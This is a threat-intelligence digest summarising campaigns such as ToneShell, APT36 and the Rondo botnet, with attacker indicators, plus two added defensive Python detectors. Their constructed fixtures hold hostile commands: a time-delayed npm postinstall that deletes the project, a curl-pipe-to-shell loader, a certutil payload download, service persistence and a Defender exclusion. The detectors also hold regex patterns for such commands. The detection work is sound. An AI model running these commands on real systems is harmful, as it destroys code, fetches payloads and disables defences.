A kernel-mode malicious driver (ProjectConfiguration.sys) signed with a leaked certificate was used to inject a new ToneShell backdoor into system processes and to protect malicious files, registry keys, and user-mode processes. This activity is attributed to the HoneyMyte APT and uses ToneShell connecting to avocadomechanism[.]com and potherbreference[.]com for C2 communication. #ToneShell #HoneyMyte
Mustang Panda has developed a new kernel-mode rootkit driver to deliver the TONESHELL backdoor to Asian government entities. The driver is signed with stolen certificates and hooks into system processes to hide the implant and its artifacts. #MustangPanda #TONESHELL…
CYFIRMA attributes a targeted multi-stage, fileless espionage campaign to APT36 (Transparent Tribe) that uses weaponized LNK files masquerading as PDFs to deliver HTA loaders and in-memory .NET deserialization payloads. The operation deploys configuration and RAT payloads (ReadOnly/WriteOnly -> ki2mtmkl.dll, iinneldc.dll), adapts persistence based on detected AV products, and maintains encrypted C2 communications to 2.56.10.86 for surveillance and data exfiltration. #APT36 #ReadOnly
CloudSEK recovered nine months of exposed RondoDoX/Rondo botnet C2 logs that document a three-phase campaign evolving from reconnaissance and web-app exploitation to large-scale IoT botnet deployment and a December 2025 Next.js Server Actions RCE wave. The activity included automated command-injection and deserialization attacks, mass binary downloads (e.g., /nuts/poop) from C2s such as 51.81.104.115 and 5.255.121.141, and repeated exploitation of internet-facing routers and Next.js servers. #Rondo #NextJS
A ransomware attack on Romania’s largest coal-based energy producer, Oltenia Energy Complex, disrupted its IT systems but did not impact national energy operations. The Gentlemen ransomware group is suspected, with investigations underway and backups being used to restore affected systems. #GentlemenRansomware #OlteniaEnergyComplex
Cybercriminals are increasingly using ClickFix kits such as ErrTraffic v2 that trick users into copying and running malicious commands themselves by showing fake error dialogs and visual glitches. The kits are sold cheaply, advertise high conversion rates, target multiple platforms, and are built to slip past common endpoint defenses. #ErrTraffic #ClickFix
A threat actor named “miya” claims to be selling access to a U.S. Student Information System used by around 150 educational institutions. The access includes root-level remote code execution on a Linux server through a firewall, posing a significant security risk. #Miya #StudentInformationSystem…
A China-linked APT group, Evasive Panda, conducted targeted cyber espionage campaigns using DNS poisoning to deliver the MgBot backdoor. The group has shown advanced techniques to evade detection and maintain persistence on victim systems. #EvasivePanda #MgBot…
A threat actor named miya is advertising the sale of initial access to a U.S.-based bank managing around $5 billion in assets, with access including Linux OS and firewall control at root level. This highlights the ongoing threat of cybercriminals targeting financial institutions for high-value cyber exploits. #InitialAccess #FinancialInstitutions…
Over the past year Socket observed a rise in destructive open-source packages that directly sabotage developer environments by deleting source code, breaking builds, and wiping repositories or CI artifacts. These packages—published to npm, PyPI, NuGet, and Go module indexes—used remote kill switches, time-delays, typosquatting/dependency confusion, and remote payload loaders to trigger targeted codebase destruction. #Socket #npm
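The kinds of sabotage packages described above are usually wired into npm lifecycle hooks, so the cheapest check a practitioner can run is over the manifest before it is installed. The scanner below is an added example, not Socket's tooling: it flags install-time scripts that match the destructive, time-delayed and remote-loader patterns from the summary, and compares the package name against a short list of popular names to catch typosquats. The manifests, package names and the example.invalid URL are constructed; the regexes and the popular-name list are assumptions.

```python
"""Scan a package.json for destructive or remote-loading lifecycle scripts and
for typosquatted names. Added example; manifests below are constructed."""
import json
import re

# Hooks that npm runs automatically during `npm install`; other scripts
# (test, build, ...) only run when a developer asks for them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (label, pattern) pairs are assumptions modelled on the behaviours in the summary.
DESTRUCTIVE = [
    ("recursive_delete",
     r"\brm\s+-[a-z]*r[a-z]*f|\brmdir\s+/s|\.rm(?:Sync)?\(.*recursive\s*:\s*true"),
    ("git_history_wipe",
     r"git\s+(?:push\s+.*--force|reset\s+--hard|clean\s+-[a-z]*f)"),
    ("remote_loader",
     r"(?:curl|wget|Invoke-WebRequest|iwr)\b.*https?://|https?://\S+\s*\|\s*(?:sh|bash|node)"),
    ("inline_eval", r"node\s+-e\b|eval\s*\("),
    ("time_trigger", r"Date\.now\(\)|new\s+Date\(|\bsleep\s+\d+|setTimeout"),
]


def scan_manifest(text):
    """Return (hook, label) findings for install-time scripts only."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # developer-invoked scripts are out of scope here
        for label, pattern in DESTRUCTIVE:
            if re.search(pattern, cmd, re.I):
                findings.append((hook, label))
    return findings


def edit_distance(a, b):
    """Levenshtein distance via a rolling single-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, popular, max_dist=1):
    """Popular package names within `max_dist` edits of `name`."""
    return [p for p in popular if p != name and edit_distance(name, p) <= max_dist]


# Constructed manifests. The postinstall payload only fires after a hypothetical
# trigger date (unix ms, 2026-01-01 UTC) and then wipes the working tree.
MALICIOUS = r"""{
  "name": "expres", "version": "4.18.2",
  "scripts": {"postinstall": "node -e \"if(Date.now()>1767225600000){require('fs').rmSync('.',{recursive:true,force:true})}\""}
}"""
LOADER = r"""{
  "name": "left-padd", "version": "1.0.0",
  "scripts": {"preinstall": "curl -s https://example.invalid/x.sh | sh"}
}"""
BENIGN = r"""{
  "name": "my-app", "version": "0.1.0",
  "scripts": {"test": "rm -rf coverage && jest", "build": "tsc"}
}"""

# Assumed allowlist of well-known names to compare against.
POPULAR = ["express", "lodash", "left-pad", "react", "axios"]

if __name__ == "__main__":
    for label, manifest in (("malicious", MALICIOUS), ("loader", LOADER), ("benign", BENIGN)):
        pkg = json.loads(manifest)
        print(label, scan_manifest(manifest), typosquat_candidates(pkg["name"], POPULAR))
```

The benign manifest also contains `rm -rf`, but in a `test` script a developer runs deliberately, so it is not flagged; the point of the check is the combination of a destructive or remote-fetching command with a hook that runs silently at install time.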
CloudSEK’s TRIAD uncovered an Income-tax-themed phishing campaign targeting India that uses an NSIS installer to drop a signed Thunder.exe and a malicious libexpat.dll, leading to in-memory Donut shellcode execution and deployment of Valley RAT. The report attributes the campaign to Silver Fox APT and details a multi-stage kill chain with DLL hijacking, process hollowing, registry-resident plugins for persistence, and a three-tier C2 infrastructure. #SilverFox #ValleyRAT
A threat actor named miya claims to be selling initial access to a UAE-based financial solutions and insurance company. The compromised environment includes Linux systems, a firewall device with root permissions, remote code execution, and shell access. #Miya #UAEFinancial #InitialAccessSale…
RTO Scam Wave Continues: A Surge in Browser-Based e-Challan Phishing and Shared Fraud Infrastructure
CRIL uncovered a large-scale, browser-based phishing campaign impersonating India’s e-Challan/Parivahan services that delivers malicious links via SMS and harvests card data through fake payment pages. The same shared infrastructure also hosts BFSI and logistics-themed lures, with key artifacts including domains like echala[.]vip and hosting IPs 101[.]33[.]78[.]145 and 43[.]130[.]12[.]41. #eChallan #StateBankOfIndia
Operation PCPcat is a large-scale cyber espionage campaign exploiting vulnerabilities in React-based web frameworks to compromise servers and steal credentials. The attack chains automated scanning, exploitation, and a central C2 server to maintain persistence and spread to further hosts, posing significant risk to modern web infrastructure. #CVE-2025-29927 #CVE-2025-66478 #ReactServers #CredentialTheft #OperationPCPcat…
Three related IIS-originated intrusions demonstrated a consistent attacker workflow: exploitation of web application flaws to run commands via w3wp.exe, attempts to deploy a Go-based agent (agent.exe/815.exe/test.exe), use of LOLBins (certutil) to fetch payloads, and attempts to establish persistence via a Windows service (dllhost.exe/WindowsUpdate) and RMM tooling (GotoHTTP). Huntress telemetry and Windows Event Logs reveal multiple failed attempts, Defender detections/quarantines, and the actor changing tactics across incidents—initially retrying tooling, then applying Defender exclusions—while reusing infrastructure such as 110.172.104.95 and several client IPs. #Warlock #GotoHTTP #SparkRAT #ShellcodeRunner #Velociraptor #Huntress
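Each stage of the workflow above leaves a process-creation event that can be matched independently, and the value of the telemetry is that the stages chain together. The rules below are an added example, not Huntress detection content: they run over constructed Sysmon-style process-creation records that mirror the summary (w3wp.exe spawning a shell, certutil fetching a payload from 110.172.104.95, a service named WindowsUpdate pointed at dllhost.exe in a temp path, and a Defender exclusion being added). Field names and the exact command lines are assumptions.

```python
"""Stage detection for the IIS intrusion workflow described above.
Added example; events below are constructed, Sysmon-style records."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _ends_with(path, *names):
    return path.lower().endswith(tuple("\\" + n for n in names))


# Each rule is (stage name, predicate). Order reflects the workflow in the summary.
RULES = [
    # Web-application exploitation surfaces as the IIS worker spawning a shell.
    ("iis_worker_spawns_shell", lambda e:
        _ends_with(e.parent_image, "w3wp.exe")
        and _ends_with(e.image, "cmd.exe", "powershell.exe")),
    # LOLBin download: certutil with urlcache/split or a URL on the command line.
    ("certutil_remote_download", lambda e:
        _ends_with(e.image, "certutil.exe")
        and re.search(r"-urlcache|-split|https?://", e.command_line, re.I)),
    # Service persistence whose binary lives in a writable temp/ProgramData path.
    ("service_persistence_from_temp", lambda e:
        _ends_with(e.image, "sc.exe")
        and re.search(r"\bcreate\b", e.command_line, re.I)
        and re.search(r"\\temp\\|\\programdata\\", e.command_line, re.I)),
    # Defense evasion after earlier quarantines: adding a Defender exclusion.
    ("defender_exclusion_added", lambda e:
        re.search(r"Add-MpPreference\b.*-Exclusion", e.command_line, re.I)),
]


def evaluate(events):
    """Return (stage, command_line) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e.command_line))
    return hits


def kill_chain_score(events):
    """Distinct stages observed; a high score across one host is the alert."""
    return len({name for name, _ in evaluate(events)})


# Constructed telemetry modelled on the three incidents in the summary.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f http://110.172.104.95/agent.exe "
              r"C:\Windows\Temp\815.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\sc.exe",
              r'sc create WindowsUpdate binPath= "C:\Windows\Temp\dllhost.exe" start= auto'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -c Add-MpPreference -ExclusionPath C:\Windows\Temp"),
    # Benign noise that must not match.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              "notepad.exe"),
]

if __name__ == "__main__":
    for stage, cmd in evaluate(SAMPLE_EVENTS):
        print(f"{stage:32} {cmd}")
    print("stages observed:", kill_chain_score(SAMPLE_EVENTS))
```

Scoring by distinct stages rather than raw hit count is deliberate: the summary notes the actor retried tooling several times, and repeated certutil attempts should not outweigh the single Defender exclusion that marks the shift in tactics.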